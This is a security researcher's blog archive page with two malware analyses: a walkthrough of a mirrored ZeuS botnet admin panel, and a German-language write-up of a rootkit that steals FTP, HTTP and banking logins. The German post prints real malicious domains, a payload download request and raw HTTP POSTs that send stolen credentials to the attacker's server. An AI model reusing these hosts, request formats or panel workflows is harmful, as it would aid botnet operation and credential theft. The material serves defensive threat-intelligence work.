Tag Archive for 'botnet'

Page 5 of 5

Insight a ZeuS C&C server

During my work on the ZeuS Tracker I often see insecure ZeuS installations that allow easy access to the ZeuS MySQL database or the ZeuS Admin Panel of a Command&Control server; In some cases the MySQL database appear for a short time on unprotected, public webservers without even a password protection, usually in order to transfer data between different criminal groups. Some time ago I had the occasion to copy such an unprotected database and mirror the ZeuS admin panel software on my own test system. This allowed me to study the Admin interface and document it in this post, so I can reveal you details about the ZeuS internals.

First of all I give you some information and statistical data about the ZeuS C&C server concerned:

Let’s say that the ZeuS C&C server is hosted on veryevilzeusdomain.tld. The botnet has a size of 3’985 infected clients (total installations). The server is currently offline and was hosted on AS9800 (UNICOM CHINA UNICOM). The C&C server was online for 25 days (2009-02-13 until 2009-03-09). During this period, the cybercriminal has captured over 3’677’358 datasets.

Below you can see some statistical data about this ZeuS Command&Control server:

Botnet size per day

ZeuS botnet size per day

Botnet geo location

ZeuS botnet geo location
Number of captured datasets

ZeuS crimeware: Number of captured datasets

Insight ZeuS

Let’s start with the ZeuS Admin Panel. Here we go…
Normally, the ZeuS Admin Panel is located on a file called “in.php”. Example:

http://veryevilzeusdomain.tld/zs/in.php

The login page of the ZeuS Panel looks like this:

ZeuS Admin Panel: Login page

On the login page, you can choose between two different languages: Russia and English. After a successful login, you will be redirected to the statistical summary of the ZeuS installation:

ZeuS Admin Panel: statistical summary

On this page you are able to group the infected clients (bots) to different botnets. This can be very useful. For example: You can group infected machines which have a fast internet connection to one “botnet”. You can also see some interesting data like how many logs are in the database, the time of first install and the total bot count.

On the section botnet->Online bots you can see some information about each bot which is currently online:

ZeuS Admin Panel: Online bots

The function Screenshot is quit interesting. With this function the cybercriminal is able to get a screenshot of each infected system, which is currently online. As you can see, the ZeuS trojan installs a backdoor which creates a SOCKS proxy and a Web proxy on the infected system. The cybercriminal can use these proxies to hide his identity while he access eg. the victims online banking account to steal money from them. By clicking on a proxy, the cybercriminal can get some information about the proxy (e.g. on which port the proxy is installed or whether the proxy is already used or not):

ZeuS Admin Panel: Proxy information

On the tab Remote commands the cybercrime can define commands for a hole botnet, bots from a specified country or just a single computer:

zeuspanel5

For example, such command can advise a infected client to download more malicious code:

ZeuS Admin Panel: Send commands to the infected systems (bots)

Here is a list of commands, which are available in the ZeuS crimeware:

  • block_url
  • unblock_url
  • rexeci
  • lexeci
  • delsf
  • resetgrab
  • getmff
  • delmff
  • getcert
  • addsff
  • rexec
  • lexec
  • getfile
  • upcfg
  • kos
  • On the navigation tab Logs the cybercriminal is able to start a log search. There, he can set a filter and search for a specified string and/or a specified Log typ. The Logs search has also a function to search in a specified time range. For example: Let’s start a search for FTP credentials which the ZeuS crimeware has captured on the 6. march:

    ZeuS Panel: Search for stolen FTP credentials

    Here is a list of Log types which the cybercriminal can search for:

  • any
  • HTTP
  • HTTPs
  • HTTP/HTTPs
  • FTP
  • POP3
  • Grabbed data
  • Protected Storage
  • IE history
  • Other
  • As you can see, the cybercriminal is also able to search for captured HTTPS credentials:

    ZeuS Panel: Search for captured HTTPS credentials

    On the screenshot above you can see that the crimeware has already stole credentials for online services like Windows Live and Google. But the crimeware is even worse: It is able to capture credentials for Online Banking accounts from HTTPS connections and from the protected storage (Pstore):

    ZeuS Panel: Stolen credentials for online banking accounts

    Last but not least on the System settings in the navigation the cybercriminal can add / edit profiles:

    ZeuS Panel: Add / Edit profile

    Conclusion

    The ZeuS crimeware kit is a big security issue and is still spearing thru Drive-By infections and mass spam campaigns like the spoofed Delta Air Line spam on February 09 (Link).

    If we take a look into the ZeuS Tracker, we can see over 100 ZeuS config files which are currently online. Additionally the tracker has already captured over 250 unique binaries.

  • browse ZeuS binaries
  • browse ZeuS config files
  • I highly recommend corporate networks to use the ZeuS blocklist to block malicious traffic from and to well known ZeuS C&C servers on the corporate web gateway/ firewall.

    Disclaimer

    The test system I used for the screenshots below was never connected to the internet, so no outbound network accesses occured during those tests. It was not required to enter any passwords or other credentials on any servers to obtain this copy of the database or the ZeuS admin panel software I mirrored – all of that was available for short periods of time unprotected on the net. But, as stated above, many real live ZeuS systems actually are insecure and would allow third parties to break in – events, that seem to occur regularly when botnets from one group are stolen by other groups.

    Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins

    Trendmicro berichtete kürzlich von einem Trojaner, welcher FTP Logins aufzeichnet und diese zu einem Server sendet. Ich habe mir den Trojaner einmal etwas genauer angeschaut:

    Der Trojaner verbreitet sich über infizierte Links in E-Mails. Klickt man auf einen der Links, gelangt man an eine der folgenden URLs:

    http://ninonem.com/login.htm

    http://repluy.com/login.htm

    http://fgienrsi.com/GetStarted.htm

    http://bberimc.com/GetStarted.htm

    http://binrye.com/GetStarted.htm

    http://unerixs.com/support.html

    Die Domains werden auf einem FastFlux Botnet gehostet (Siehe dnsbl.abuse.ch FastFlux domain check):

    Der Inhalt der Webseiten ist immer Derselbe:

    Die Webseite möchte dem Besucher weiss machen, dass er doch das Security Plus Certificate der in der USA ansässigen Bank Wachovia herunterladen und installieren soll. In der Datei Sslupdate.exe befindet sich nicht etwas ein Sicherheits-Zertifikat, sonder viel mehr ein Trojaner namens Suceret / WebDown:

    Filename: Sslupdate.exe
    File size: 3188 bytes
    MD5…: c4906f64d0ea19dab7a9e7626ee40781
    SHA1..: 7301f0781b8a56f7b0fd59c531fa288d48c16d3e
    Erkennungsrate: 16/36 (44.44%)

    Führt man die Datei aus, nimmt der Trojaner sofort Kontakt mit lodnew.com auf, welche ebenfalls auf einem FastFlux Botnet gehostet wird, und lädt dort weiteren Schadcode nach:

    GET http://loadnew.com/s.exe

    Filename: s.exe
    File size: 32256 bytes
    MD5…: d951f3a8e3485c3c150ba17c0f53db86
    SHA1..: 9d4e1df3237c34c85d14a5a477a5e2dc153edd42
    Erkennungsrate: 5/36 (13.89%)

    Der Trojaner richtet sich nun als Rootkit im System ein und installiert einen Keylogger der
    Win32/Ursnif Familie:

    C:\WINDOWS\9129837.exe
    C:\WINDOWS\new_drv.sys
    C:\WINDOWS\system32\8085.dll

    Des Weiteren installiert der Trojaner einen Backdoor auf einem beliebigen TCP Port:

    Nun kontaktiert er die Domain 1.alisiosanguera.com.cn (91.203.92.103):

    GET 1.alisiosanguera.com.cn/cgi-bin/cmd.cgi?user_id=*HDSERIALNR*&version_id=289&passphrase=fkjvhsdvlksdhvlsd&socks=19726&version=125&crc=00000000

    Bevor wir weiter auf diese URL eingehen, gibt es eine Quiz-Frage von mir: Was denkt ihr, in wessen Subnet liegt die IP-Adresse 91.203.92.103 (1.alisiosanguera.com.cn)? Genau, einmal mehr liegt diese IP-Adresse in den Händen der UATelecom! Bei Spamhaus gibt es auch bereits einen entsprechenden SBL dazu: SBL68462. Zurück zum Thema. In der URL werden folgende Informationen übermittelt:

    user_id = Eindeutige Serien Nummer der HardDisk
    version_id = ??
    passphrase = ??
    socks = TCP Port, auf welchem der Trojaner horcht
    version= Version des installierten Trojaners
    ctc= ??

    Die genannte URL wird dabei in regelmässigen Abständen wieder kontaktiert. Soweit so gut. Richtig interessant wird es aber erst jetzt: Der Trojaner sammelt sämtliche Logins von HTTP, HTTPS und FTP Traffic und sendet die gestohlenen Logins an einen Server. Etwa im Fall einer FTP Verbindung sieht dies folgendermassen aus:

    POST /cgi-bin/forms.cgi HTTP/1.1
    User-Agent: IE
    Host: 1.alisiosanguera.com.cn
    Content-Length: 370
    Cache-Control: no-cache

    Content-Disposition: form-data; name=”upload_file”; filename=”4654654.342″
    Content-Type: *ftpserver*.ch&ftp_login=anonymous&ftp_pass=IEUser@&version=0

    Der Trojaner überträgt die IP Adresse des infizierten Servers inklusive Login sowie Server Adresse an den Server 1.alisiosanguera.com.cn (91.203.92.103). Das Gleiche gilt wie bereits erwähnt auch für HTTP und HTTPS Traffic. Hier das Beispiel eines eBanking Logins über eine scheinbar sichere HTTPS-Verbindung:

    POST /cgi-bin/forms.cgi HTTP/1.1
    User-Agent: IE
    Host: 1.alisiosanguera.com.cn
    Content-Length: 362
    Cache-Control: no-cache

    Content-Disposition: form-data; name=”upload_file”; filename=”4179642204.289″
    Content-Type: application/octet-stream

    URL: https://onlinebank.*.ch/?login
    passw=*passwort*&login=*PIN/TAN*&p_userid=*vertragsnummer*

    Wie man sehr schön sieht, überträgt der Trojaner URL, Vertragsnummer, Passwort sowie PIN/TAN der Onlinebank – die aber im Falle eines Einmal-PIN/TANs in diesem Moment für den Angreifer keinen Nutzen mehr hat. Ob Challenge-Response Verfahren moderner Telebanking-Systeme ebenfalls angegriffen werden, konnte ich mangels eines gültigen Kontos leider nicht testen.

    Im Gegensatz zum Banken Trojaner WSNPoem und Torpig “schiesst” dieser Trojaner auf alles was ihm in die Quere kommt. Das heisst, er zielt nicht im Speziellen auf Banken oder andere spezifische Ziele ab sonder greift alles an, was nach einem Login aussieht. Der Einsatz von SSL schützt dabei nicht, da die Passwörter oberhalb des SSL-Layers abgegriffen wird.

    Fazit

    Die Spam-Mails, welche den Trojaner respektive die infizierten URLs beinhalten, werden derzeit zwar ausschliesslich in den USA versendet, jedoch ist die Malware (zumindest für mich) äusserst interessant: Am vergangenen Wochenende bin ich auf einen Command&Control Server gestossen, welcher einen anderen Trojaner mit FTP-Credentials von Webservern versorgt, damit dieser danach versucht, auf diesen Webservern DriveBy-Infektionen zu platzieren – also eine Infrastruktur zum verteilten Infizieren von Webservern. Es war mir möglich, dieses C&C anzuzapfen und mittlerweile eine (noch immer wachsende) Liste mit über 50′000 FTP Logins zu sammeln. Es ist anzunehmen, dass dieser Server eben über einen Keylogger wie dem Vorliegenden mit Passwörtern gefüttert wird. Möglicherweise besteht sogar ein direkter Zusammenhang zwischen diesen beiden Komponenten.

    Es bleibt noch zu erwähnen, dass das Botnetz, welches die Domains hostet, früher bereites WSNPoem sowie verschiedene Money-Mule und phishing Domains gehostet hat.

    Zu guter Letzt wie immer die Liste mit URLs und IPs, welche blockiert werden sollten:

  • ninonem.com
  • repluy.com
  • fgienrsi.com
  • bberimc.com
  • binrye.com
  • unerixs.com
  • securebbb.com
  • alisiosanguera.com.cn
  • loadnew.com
  • 91.203.92.103



  • economics-recluse
    Scene
    Urgent!